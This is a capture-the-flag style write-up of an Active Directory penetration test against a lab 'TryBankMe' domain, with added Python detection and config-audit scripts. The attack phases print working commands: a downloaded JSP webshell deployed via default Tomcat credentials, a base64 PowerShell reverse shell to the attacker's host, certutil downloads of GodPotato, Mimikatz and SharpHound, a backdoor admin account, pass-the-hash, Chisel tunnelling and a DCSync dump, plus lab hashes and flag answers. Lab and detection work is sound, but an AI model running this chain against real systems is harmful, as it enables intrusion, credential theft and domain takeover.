AD Report

Uploaded by fidaxop276

For your understanding, here is the scope:

In-Scope

Assessment Targets:

10.200.150.10 - AD Domain Controller

10.200.150.20 - Standard domain-joined server/workstation

TryBankMe's internal infrastructure includes a newly built Active Directory (AD) domain that will eventually support internal operations, identity management, and service authentication across its banking systems. As the domain is still under development, this assessment serves as an early-stage configuration review and compromise simulation.

Your goal is to assess whether misconfigurations, insecure permissions, or poor implementation choices exist that could allow compromise of key AD assets. Specifically, you will test access to both a standard AD-connected server and the domain controller.

This early review will help the TryBankMe team address weaknesses before
expanding production infrastructure.

Attack Path to Compromise the Workstation (10.200.150.20)

Phase 1: Service Discovery and Vulnerability Identification

The attack began with comprehensive network scanning of the target workstation at 10.200.150.20 using Nmap with aggressive timing parameters (-T4) and host discovery disabled (-Pn).

nmap -p- --open 10.200.150.20 -vv -T4 -Pn

This revealed four critical open ports:

Port 445 (SMB): Potential lateral movement pathway

Port 3389 (RDP): Graphical remote access interface

Port 5985 (WinRM): Windows Remote Management service

Port 8080 (HTTP): Apache Tomcat service

Manual inspection of the Tomcat service at http://10.200.150.20:8080 revealed the Manager application interface at /manager/html. This interface required authentication, and testing of default credentials (tomcat:s3cret) successfully granted access to the application deployment dashboard.
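The default-credential finding above maps directly to a configuration check. The following Python script is an added example, not part of the original report or of the TryBankMe environment: it audits a tomcat-users.xml file for the example credential pairs that ship with Tomcat, for Manager roles protected by short passwords, and for the manager-gui plus manager-script/manager-jmx combination that Tomcat's documentation advises against. The two XML samples, the 14-character password threshold and the ci-deployer account name are constructed for illustration.

```python
import xml.etree.ElementTree as ET

# Credential pairs that ship (commented out) in Tomcat's example tomcat-users.xml.
# tomcat:s3cret is the pair the assessment found enabled on 10.200.150.20.
EXAMPLE_CREDENTIALS = {("tomcat", "tomcat"), ("tomcat", "s3cret")}
# Roles that expose the Manager application's deployment and monitoring features.
MANAGER_ROLES = {"manager-gui", "manager-script", "manager-jmx", "manager-status"}
MIN_PASSWORD_LENGTH = 14  # assumed local policy threshold, not a Tomcat default


def _local_name(tag):
    # tomcat-users.xml is usually namespaced (xmlns="http://tomcat.apache.org/xml");
    # strip the namespace so the element check works with or without it.
    return tag.rsplit("}", 1)[-1]


def audit_tomcat_users(xml_text):
    """Return (username, issue) findings for the given tomcat-users.xml content."""
    findings = []
    for elem in ET.fromstring(xml_text).iter():
        if _local_name(elem.tag) != "user":
            continue
        # Tomcat accepts either 'username' or 'name' for the account attribute.
        name = elem.get("username") or elem.get("name") or ""
        password = elem.get("password") or ""
        roles = {r.strip() for r in (elem.get("roles") or "").split(",") if r.strip()}
        if (name, password) in EXAMPLE_CREDENTIALS:
            findings.append((name, "example credential pair from the shipped tomcat-users.xml"))
        if roles & MANAGER_ROLES:
            if len(password) < MIN_PASSWORD_LENGTH:
                findings.append((name, "manager role protected by a password shorter than %d characters"
                                 % MIN_PASSWORD_LENGTH))
            if "manager-gui" in roles and roles & {"manager-script", "manager-jmx"}:
                findings.append((name, "manager-gui combined with manager-script/manager-jmx on one account"))
    return findings


# Constructed sample resembling the state found during the assessment.
WEAK_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-gui"/>
  <user username="tomcat" password="s3cret" roles="manager-gui"/>
</tomcat-users>
"""

# Constructed sample of a corrected file: a unique account, a long random password,
# and only the script role (no browser GUI) for automated deployments.
HARDENED_TOMCAT_USERS = """<tomcat-users xmlns="http://tomcat.apache.org/xml" version="1.0">
  <role rolename="manager-script"/>
  <user username="ci-deployer" password="Xq7!pLm2#vR9wTz4Bn" roles="manager-script"/>
</tomcat-users>
"""

if __name__ == "__main__":
    for label, doc in (("weak", WEAK_TOMCAT_USERS), ("hardened", HARDENED_TOMCAT_USERS)):
        print(label, audit_tomcat_users(doc))
```

Run it against $CATALINA_BASE/conf/tomcat-users.xml; an empty list means none of the three conditions was present. Independently of credentials, restricting the Manager application to administrative source addresses (Tomcat's RemoteAddrValve) removes the exposure used in this assessment even if a password leaks.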

Phase 2: Malicious Payload Deployment

Using publicly available webshell resources, the attacker downloaded a JSP command execution script (cmd.jsp) from a GitHub repository. This script was packaged into a WAR archive named backup.war using the ZIP utility to camouflage it as a legitimate backup file.

wget https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp

zip -r backup.war cmd.jsp

The malicious archive was uploaded through Tomcat Manager's deployment interface, which automatically extracted it to the web directory at /webapps/backup/.

The webshell was then accessed at:

http://10.200.150.20:8080/backup/cmd.jsp?cmd=whoami

which confirmed the execution context as nt authority\local service, a privileged service account with SeImpersonatePrivilege enabled. This weakness existed because Tomcat was running with excessive privileges rather than under a dedicated service account.
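For the detection side of Phase 2, here is an added Python example (not from the original report) that runs three rules over Tomcat access-log lines in the default AccessLogValve format: a successful POST to a Manager deploy endpoint, a request for a .jsp page carrying a cmd-style query parameter, and a request to a context that did not exist before a deploy by the same client. The five log lines are constructed to mirror the sequence described above; the timestamps and the CSRF nonce value are invented.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Matches Tomcat's default AccessLogValve pattern: %h %l %u %t "%r" %s %b
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ (?P<user>\S+) \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) \S+" (?P<status>\d{3}) (?P<size>\S+)$'
)
# Manager endpoints that deploy a new context (HTML upload form and text interface).
DEPLOY_PATHS = ("/manager/html/upload", "/manager/html/deploy", "/manager/text/deploy")
# Query parameters commonly used by command-execution JSP pages; extend for local needs.
SHELL_PARAMS = {"cmd", "command"}


def parse_access_line(line):
    """Parse one access-log line into a dict, or return None if it does not match."""
    m = LOG_RE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = parse_qs(parts.query)
    return rec


def context_of(path):
    """Return the first path segment, i.e. the Tomcat context ('/backup' for /backup/cmd.jsp)."""
    segs = path.split("/")
    return "/" + segs[1] if len(segs) > 1 and segs[1] else "/"


def detect_manager_abuse(lines):
    """Return (rule, client, detail) findings for Manager deploys and webshell-style requests."""
    findings = []
    known_contexts = set()   # contexts observed so far
    deployers = set()        # clients that performed a successful deploy
    for line in lines:
        rec = parse_access_line(line)
        if rec is None:
            continue
        host, path, ctx = rec["host"], rec["path"], context_of(rec["path"])
        if rec["method"] in ("POST", "PUT") and path.startswith(DEPLOY_PATHS) and rec["status"] == "200":
            findings.append(("manager_deploy", host, path))
            deployers.add(host)
            continue
        if path.endswith(".jsp") and SHELL_PARAMS & set(rec["query"]):
            findings.append(("webshell_parameter", host, path))
        if host in deployers and ctx not in known_contexts and ctx not in ("/", "/manager"):
            findings.append(("new_context_after_deploy", host, ctx))
        known_contexts.add(ctx)
    return findings


# Constructed access-log excerpt mirroring the sequence in the report.
SAMPLE_ACCESS_LOG = """\
10.250.1.6 - - [12/May/2025:14:01:50 +0000] "GET /manager/html HTTP/1.1" 401 2473
10.250.1.6 - tomcat [12/May/2025:14:01:58 +0000] "GET /manager/html HTTP/1.1" 200 14321
10.250.1.6 - tomcat [12/May/2025:14:02:11 +0000] "POST /manager/html/upload?org.apache.catalina.filters.CSRF_NONCE=ABC123 HTTP/1.1" 200 14522
10.250.1.6 - - [12/May/2025:14:02:30 +0000] "GET /backup/cmd.jsp?cmd=whoami HTTP/1.1" 200 312
10.200.150.15 - - [12/May/2025:14:03:00 +0000] "GET /docs/index.html HTTP/1.1" 200 8901
"""

if __name__ == "__main__":
    for finding in detect_manager_abuse(SAMPLE_ACCESS_LOG.splitlines()):
        print(finding)
```

The third rule is the one that survives renaming of the webshell parameter: a context appearing for the first time right after a deploy by the same client is the Manager-abuse pattern itself, regardless of what the deployed JSP is called.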

Phase 3: Reverse Shell Establishment

The attacker initiated a Netcat listener on port 5555:

rlwrap -f . -r nc -nvlp 5555

A Base64-encoded PowerShell reverse shell payload was generated targeting the attacker's machine (10.250.1.6:5555) and executed through the webshell:

powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMgA1ADAALgAxAC4ANgAiACwANQA1ADUANQApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

This established a persistent reverse shell connection, providing interactive command-line access as nt authority\local service. Host enumeration revealed the flag at C:\flag.txt containing THM{ac0c3f6b-f95a-4e0c-b7a9-6b8408d5be4c}.
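Phase 3 leaves a characteristic process chain on the host: the Tomcat java.exe process spawns cmd.exe, which spawns powershell.exe with an -EncodedCommand argument. The Python below is an added example, not part of the original report, that applies two rules to process-creation records in the shape of Sysmon Event 1 or Security Event 4688 and decodes the UTF-16LE base64 behind -e so an analyst can read the command. The three records are constructed; the encoded payload is a harmless Write-Output rather than the reverse shell used in the assessment, and the image paths and user names are assumed.

```python
import base64

# Process images that indicate a web-server parent (Tomcat runs inside java.exe or the
# tomcatN.exe service wrapper) and the interpreters a webshell typically spawns from it.
WEB_SERVER_IMAGES = {"java.exe", "tomcat8.exe", "tomcat9.exe", "w3wp.exe", "httpd.exe"}
SHELL_IMAGES = {"cmd.exe", "powershell.exe", "pwsh.exe"}


def basename(path):
    """Lower-case file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def decode_encoded_command(command_line):
    """Return the text behind a PowerShell -EncodedCommand argument, or None if absent/malformed.

    PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...); the
    value is base64 of UTF-16LE text, which is why 'powershell -e JAB...' decodes to '$...'.
    """
    tokens = command_line.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok[0] not in "-/":
            continue
        flag = tok[1:].lower()
        if flag.startswith("e") and "encodedcommand".startswith(flag):
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def triage_process_events(events):
    """Apply two rules to process-creation records and return the findings."""
    findings = []
    for ev in events:
        parent, image = basename(ev["ParentImage"]), basename(ev["Image"])
        # Rule 1: a web server process should not be spawning command interpreters.
        if parent in WEB_SERVER_IMAGES and image in SHELL_IMAGES:
            findings.append({"rule": "webserver_spawned_shell", "parent": parent,
                             "image": image, "user": ev["User"]})
        # Rule 2: encoded PowerShell anywhere; decode it for the analyst.
        if image in ("powershell.exe", "pwsh.exe"):
            decoded = decode_encoded_command(ev["CommandLine"])
            if decoded is not None:
                findings.append({"rule": "encoded_powershell", "parent": parent,
                                 "user": ev["User"], "decoded": decoded})
    return findings


# Constructed benign payload so the decoding step can be shown without the report's real one.
SAMPLE_ENCODED = base64.b64encode("Write-Output 'sample'".encode("utf-16-le")).decode("ascii")

# Constructed records mirroring the chain java.exe -> cmd.exe -> powershell.exe -e ...
SAMPLE_EVENTS = [
    {"ParentImage": r"C:\Program Files\Java\jre\bin\java.exe", "Image": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "cmd.exe /c powershell -e " + SAMPLE_ENCODED, "User": r"NT AUTHORITY\LOCAL SERVICE"},
    {"ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell -e " + SAMPLE_ENCODED, "User": r"NT AUTHORITY\LOCAL SERVICE"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -NoProfile -Command Get-Date", "User": r"TRYBANKME\analyst"},
]

if __name__ == "__main__":
    for finding in triage_process_events(SAMPLE_EVENTS):
        print(finding)
```

Rule 1 needs command-line and parent-process logging to be enabled (Sysmon, or 4688 with command-line auditing), which the default Windows configuration does not provide; without it the java.exe to cmd.exe relationship in this assessment is never recorded.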

Attack Path to Compromise the Domain Controller (10.200.150.10)

Step 1: Initial Access via Workstation (10.200.150.20)

1.1. Reverse Shell Exploitation:

Gained initial access to the workstation (10.200.150.20) via a reverse shell on Apache Tomcat, running as nt authority\local service with SeImpersonatePrivilege enabled.

1.2. Privilege Escalation:

Downloaded exploit tools from the attacker's Kali machine (10.250.1.6:8001):

certutil -urlcache -f http://10.250.1.6:8001/Godpotato-Net4.exe C:\tomcat\apache-tomcat-8.5.50\temp\Godpotato-Net4.exe

Executed GodPotato-NET4.exe to abuse SeImpersonatePrivilege and gain SYSTEM privileges:

GodPotato-NET4.exe -cmd "cmd.exe /c net user mulware password123! /add && net localgroup Administrators mulware /add"

Created a local admin user mulware with password password123!.

1.3. RDP Access:

Connected to the workstation via RDP:

xfreerdp3 /v:10.200.150.20 /u:mulware /p:'password123!' /workarea /smart-sizing /cert:ignore

Step 2: Credential Theft & Lateral Movement

2.1. Mimikatz for Hash Extraction

Downloaded Mimikatz and extracted it on the workstation:

certutil -urlcache -f http://10.250.1.6:8001/mimikatz_trunk.zip C:\tomcat\apache-tomcat-8.5.50\temp\mimikatz_trunk.zip

Expand-Archive -Path "C:\tomcat\apache-tomcat-8.5.50\temp\mimikatz_trunk.zip" -DestinationPath "C:\tomcat\apache-tomcat-8.5.50\temp\mimikatz" -Force

Executed Mimikatz as Administrator to dump credentials:

privilege::debug

sekurlsa::logonpasswords

Extracted NTLM hash for svc.callback:

66338f1647cc6a33fd686cd20e7bb917

2.2. Pass-the-Hash to Reauthenticate:

Used svc.callback's hash to gain a shell on the workstation:

impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:66338f1647cc6a33fd686cd20e7bb917 svc.callback@10.200.150.20

Step 3: Tunneling to Domain Controller (10.200.150.10)

Chisel Tunnel Setup:

Started Chisel server on Kali:

chisel server --reverse --port 9001

Executed Chisel client on the workstation:

chisel.exe client 10.250.1.6:9001 R:socks

Configured proxychains on Kali by adding the line below to /etc/proxychains.conf:

socks5 127.0.0.1 1080

Step 4: Domain Reconnaissance & Privilege Escalation

4.1. SharpHound for AD Enumeration:

Downloaded SharpHound:

certutil -urlcache -f http://10.250.1.6:8001/sharphound.exe C:\tomcat\apache-tomcat-8.5.50\temp\sharp.exe

Executed data collection:

.\sharp.exe --collectionmethods All

Analyzed results in BloodHound, revealing svc.callback had GenericWrite over a group nested under Domain Admins.

4.2. Adding to Domain Admins:

Added svc.callback to the Domain Admins group using pth-net over proxychains:

proxychains4 pth-net rpc group addmem "Domain Admins" "svc.callback" -U "tryhackme.loc"/"svc.callback"%"aad3b435b51404ee:66338f1647cc6a33fd686cd20e7bb917" -S dc.tryhackme.loc

Step 5: Compromising the Domain Controller

5.1. DCSync Attack:

Dumped domain hashes via proxychains:

proxychains4 impacket-secretsdump "tryhackme.loc"/svc.callback@10.200.150.10 \
  -hashes aad3b435b51404ee:66338f1647cc6a33fd686cd20e7bb917 \
  -just-dc

This yielded the Administrator NTLM hash:

89514fef98d0721a55fe9064557f3fe8
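Steps 4.2 and 5.1 both leave Security-log events on the domain controller: adding svc.callback to Domain Admins produces Event 4728 (member added to a security-enabled global group), and the DCSync in 5.1 produces Event 4662 with the directory replication extended rights requested on the domain naming context. The following Python example is added here and is not part of the original report; it evaluates both conditions over event dicts with the field names Windows uses. The four sample events, the helpdesk01, bob and Sales names, and the allowlist containing only the DC$ machine account are constructed.

```python
import re

# Extended rights requested during directory replication; a DCSync request asks for these
# on the domain naming context. The GUIDs are the well-known AD schema values.
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
# Member-added events: 4728 global, 4756 universal, 4732 domain-local security groups.
GROUP_ADD_EVENT_IDS = {4728, 4756, 4732}
PRIVILEGED_GROUPS = {"domain admins", "enterprise admins", "schema admins", "administrators"}
# Constructed allowlist: accounts expected to replicate (domain controller machine accounts).
REPLICATION_ALLOWLIST = {"dc$"}
GUID_RE = re.compile(r"[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}")


def detect_domain_abuse(events):
    """Return (rule, subject, target, detail) findings from Security-log event dicts."""
    findings = []
    for ev in events:
        event_id = ev.get("EventID")
        subject = ev.get("SubjectUserName", "").lower()
        if event_id in GROUP_ADD_EVENT_IDS:
            group = ev.get("TargetUserName", "")
            if group.lower() in PRIVILEGED_GROUPS:
                findings.append(("privileged_group_member_added", subject, group,
                                 ev.get("MemberName", "")))
        elif event_id == 4662:
            requested = set(GUID_RE.findall(ev.get("Properties", "").lower()))
            rights = sorted(REPLICATION_RIGHTS[g] for g in requested & REPLICATION_RIGHTS.keys())
            if rights and subject not in REPLICATION_ALLOWLIST:
                findings.append(("dcsync_replication_request", subject,
                                 ev.get("ObjectName", ""), ", ".join(rights)))
    return findings


# Constructed events; the GUID strings mimic the Properties field of a real 4662.
SAMPLE_EVENTS = [
    # Step 4.2: svc.callback added to Domain Admins (global group -> 4728).
    {"EventID": 4728, "SubjectUserName": "svc.callback", "TargetUserName": "Domain Admins",
     "MemberName": "CN=svc.callback,CN=Users,DC=tryhackme,DC=loc"},
    # Routine change: helpdesk adds a user to a non-privileged group.
    {"EventID": 4728, "SubjectUserName": "helpdesk01", "TargetUserName": "Sales",
     "MemberName": "CN=bob,CN=Users,DC=tryhackme,DC=loc"},
    # Legitimate replication by a domain controller's machine account.
    {"EventID": 4662, "SubjectUserName": "DC$", "ObjectName": "DC=tryhackme,DC=loc",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Step 5.1: the same rights requested by a user account (DCSync).
    {"EventID": 4662, "SubjectUserName": "svc.callback", "ObjectName": "DC=tryhackme,DC=loc",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
]

if __name__ == "__main__":
    for finding in detect_domain_abuse(SAMPLE_EVENTS):
        print(finding)
```

Legitimate replication comes from domain controller machine accounts and from any directory-synchronisation service accounts the environment runs (Azure AD Connect is the usual one), so the allowlist has to be maintained per environment; any other principal requesting DS-Replication-Get-Changes-All on the naming context warrants an alert, and 4662 must be enabled through the Directory Service Access audit subcategory for the event to exist at all.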

5.2. Gaining DC Shell:

Used the Administrator hash to access the DC:

proxychains4 impacket-psexec administrator@10.200.150.10 -hashes :89514fef98d0721a55fe9064557f3fe8

5.3. Flag Extraction:

Navigated to C:\ and read flag.txt:

cd C:\

type flag.txt

Flag Captured: THM{189e5434-3213-4271-854b-63e4e4168ed7}.
